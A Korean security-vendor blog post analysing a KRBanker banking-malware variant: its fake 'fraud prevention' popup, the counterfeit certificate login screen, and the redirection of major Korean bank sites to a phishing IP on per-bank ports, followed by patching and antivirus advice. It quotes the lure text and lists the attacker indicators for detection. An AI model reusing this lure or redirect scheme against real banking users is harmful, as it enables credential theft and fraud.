악성파일에 감염된 이후 일정시간이 지나면 다음과 같이 한글로 작성된 가짜 안내 메시지 창이 사용자 컴퓨터 화면에 강제로 출력된다. 악성파일 스스로가 전자금융사기용이라는 점에서 사용자를 2번 속이는 매우 황당한 메시지 창이라 할 수 있고, 그 만큼 최근에 이런 보안위협이 증가하고 있다는 것을 역이용한 것이다.

더불어 안내 메시지 창은 한글 문법상 잘못된 부분은 크게 없어보이나, 일부 잘못된 띄어쓰기가 존재하는 등 매우 어눌한 특징이 있다. 이 부분은 최근까지 발견된 인터넷 뱅킹용 악성파일이 접근시도하는 피싱사이트에서 흔히 접할 수 있었던 공통점 중 하나이다. 이것으로 보아 한글을 구사할 수 있는 사람이 악성파일 제작에 참여하고 있는 것으로 추정된다.

제목 :
전자금융사기 예방서비스 시행안내

내용 :
피싱및 해킹으로인한 금융사기가 지속적으로 발생하고 있습니다.
10월15일 부터 모든 은행권에서 전자금융사기 예방서비스를 시행합니다.
자세한 사항은 각은행 홈페이지에서 확인하시기 바랍니다.

 
악성파일은 다음과 같이 국민은행, 우리은행, 농협, 하나은행, 기업은행, 신한은행, 우체국, 새마을금고 등의 인터넷 뱅킹 사이트를 미국의 특정 피싱사이트 IP주소(184.105.203.52)로 가로채기 하도록 프로그래밍되어 있다.


악성파일 코드를 분석해 보면 내부 리소스에 가짜 공인인증서가 나오도록 한글로 된 여러가지 기능이 포함되어 있다. 실제로 피싱 사이트에서 공인인증서 로그인 시도시 조작된 가짜 공인인증서 화면이 출력되어 사용자로 부터 공인인증서 정보 유출을 시도한다.


이번에 발견된 가짜 공인인증서 화면은 기존보다 훨씬 정교화되었다. 각각의 메뉴와 아이콘을 개별적인 리소스로 사용하였고, 한글 델파이 언어를 통해서 한글도 적절히 사용하였다.

정상적인 공인인증서 로그인 화면과 조작된 가짜 공인인증서 로그인 화면을 비교해 보면, 인증서 메뉴의 문자[구분] 등에서 정렬방식에서 차이가 조금 있고, [인증서보기][인증서 찾기][인증서 삭제]와 [선택한 인증서의 암호를 입력하세요.] 등의 줄 간격이 매우 조금 차이가 날 뿐 육안으로 구분하기 어려울 정도로 정교하게 만들어져 있다.


악성파일이 감염된 상태에서 사용자가 다음과 같은 국내 인터넷 뱅킹 사이트를 접속할 경우 가짜 피싱사이트 IP주소(184.105.203.52)로 접속이 변경된다. 그러나 사용자의 인터넷 웹 브라우저 주소에는 정상적인 인터넷 뱅킹 도메인 주소가 보여지기 때문에 사용자는 가짜 사이트인지 육안으로 판단하기가 쉽지 않다.


은행별로 피싱 IP주소(184.105.203.52)와 포트가 매칭되도록 만들어져 있으며, 해당 IP주소는 공격자가 언제든지 변경해서 사용할 수 있으므로, 지속적인 탐지와 차단이 요구된다. 피싱 IP 주소는 미국의 호스트에서 사용하는 곳이다.


kbstar.com (국민은행)
http://184.105.203.52

wooribank.com (우리은행)
http://184.105.203.52:81

banking.nonghyup.com (농협)
http://184.105.203.52:82/

keb.co.kr (외환은행)
http://184.105.203.52:83/

hanabank.com (하나은행)
http://184.105.203.52:84/

mybank.ibk.co.kr (기업은행)
http://184.105.203.52:85/

http://www.ibk.co.kr/ (기업은행)
http://184.105.203.52:86/

banking.shinhan.com (신한은행)
http://184.105.203.52:87/

epostbank.go.kr (우체국)
http://184.105.203.52:88/

ibs.kfcc.co.kr (새마을금고)
http://184.105.203.52:89/

보통 최근에 많이 발견되는 피싱은 시중 금융권이 사용하는 인터넷 뱅킹 도메인과 유사한 방식으로 사용자를 속이는 방법이 많이 사용된다. 하지만 이 방식은 실제 정상적인 인터넷 뱅킹 주소가 보여진다. 따라서 국내 인터넷 뱅킹용 악성파일(KRBanker) 변종에 감염된 경우 다음과 같이 국민은행에 접속하면 정상적인 도메인으로 연결이 된다. 악성파일은 사용자가 국민은행에 접속된 것을 인지하고, 사용자가 [로그인] 버튼을 클릭시도하게 되면 피싱사이트로 IP주소를 가로채기 시도하기 때문에 육안상으로 확인가능한 도메인 주소만으로 진짜 및 가짜 여부를 판단하기는 거의 불가능하다.


피싱사이트로 접속이 이루어지면, 기존과 동일하게 보안승급(강화)서비스라는 명목으로 사용자 정보입력을 유도하고, 가짜공인인증서 화면 등을 통해서 인증서 정보 탈취를 시도한다.


기타 다른 은행과 관련된 피싱사이트들도 유사한 방식으로 사용자들의 금융정보 탈취를 시도한다.

 






 

 

3. 국내 인터넷 뱅킹용 악성파일 대비

악성파일(KRBanker)을 조직적으로 유포시도하는 범죄자들은 짧은 시간에 많은 사용자들에게 악성파일을 설치하는 것이 가장 주된 목적 중에 하나이다. 그 만큼 고도의 다중 공격수법을 활용하고자 하는 것이 일반적이며, 최신 보안 취약점과 불법적인 해킹 등을 결합하여 사용한다. 또한, 상대적으로 인터넷 이용률이 높고 보안업무 근무자가 적은 주말이나 야간시간에 집중적으로 악성파일을 배포하는 성향을 띄고 있다. 더불어 국내의 수 많은 웹 사이트와 개인 컴퓨터가 Malware Botnet 과 C&C 서버로 남용되고 있어 인터넷이 마치 커다란 지뢰밭과 같은 위험 천만한 곳이라 해도 과언이 아닐 정도이다.

국민은행에서는 다음과 같이 금융사기 주의 안내 공지를 제공하고 있다.


그렇다면 이런 위험한 상황에서 악성파일(KRBanker)로 부터 안전하게 자신의 금융자산을 보호하기 위한 방안은 무엇일까? 제일 먼저 악성파일이 유입될 수 있는 조건을 최소화하는 것이다. ▶이미 널리 알려져 있는 대표적인 보안취약점을 모두 업데이트하여 제거하고자 하는 사용자 스스로의 능동적인 노력이다. 악성파일들은 Zero-Day 공격뿐만 아니라 이미 널리 알려져 있는 최신 보안취약점을 이용해서 해킹된 웹 사이트에 접속만으로도 감염될 수 있도록 하는 방식을 널리 이용하고 있다. 따라서 다음과 같은 보안 업데이트는 선택이 아닌 필수로 반드시 설치하도록 하며, 수시로 취약점이 발견되고 있으니, 최소 1~2주일에 한번 이상은 최신 보안업데이트 출시 여부를 파악해서 설치하도록 하여야 한다.

[중요]개그콘서트에 없는 네가지? 오해하지마! 보안 업데이트
http://erteam.nprotect.com/250


A. Windows 제품군
http://www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ko


B. Adobe 제품군
- 플래시 플레이어와 PDF 리더
http://get.adobe.com/kr/flashplayer/ / http://get.adobe.com/kr/reader/

C. JAVA 제품군
http://www.java.com/ko/

그외 기본적인 보안제품(Anti-Virus, Personal Firewall) 등을 설치하고, 최신 업데이트를 반드시 설치하고, 백신의 경우 실시간 감시 기능을 활성화하여 이미 알려져 있는 악성파일이 감염활동하지 못하도록 시스템의 보안을 강화한다.

위와 같은 악성파일로 부터 안전한 PC사용을 유지하기 위해서 아래와 같은 기본적인 보안 관리 수칙을 준수하여 악성파일 감염을 사전에 예방할 수 있도록 하자.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 위와 같은 악성파일을 포함한 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

nProtect Anti-Virus/Spyware v3.0 제품에서는 다양한 변종 악성파일을 진단/치료하고 있다.

▣ AVS 3.0 무료 설치 : http://avs.nprotect.com/


저작자 표시
신고
Posted by nProtect